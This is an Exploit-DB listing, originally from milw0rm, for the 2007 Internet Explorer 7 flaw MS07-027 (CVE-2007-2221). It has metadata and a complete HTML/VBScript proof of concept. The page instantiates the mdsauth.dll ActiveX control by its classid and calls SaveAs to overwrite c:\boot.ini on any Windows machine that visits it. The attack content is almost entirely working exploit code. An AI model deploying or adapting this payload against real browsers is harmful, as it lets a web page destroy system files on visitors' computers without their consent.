EXPLOITS

Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)

Author: Andres Tarasco
type: remote
platform: windows
port: 
date_added: 2007-05-09  
date_updated: 2016-10-05  
verified: 1  
codes: OSVDB-34404;CVE-2007-2221;MS07-027  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.commsie7.exe  

raw file: 3892.html  

<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">

</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
 target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
 target.SessionAuthor="Andres Tarasco Acuna"
 target.SessionEmailContact="atarasco_at_gmail.com"
 target.SessionURL="http://www.514.es"
 target.SaveAs "c:\boot.ini"
</script>

</body>
</html>

# milw0rm.com [2007-05-10]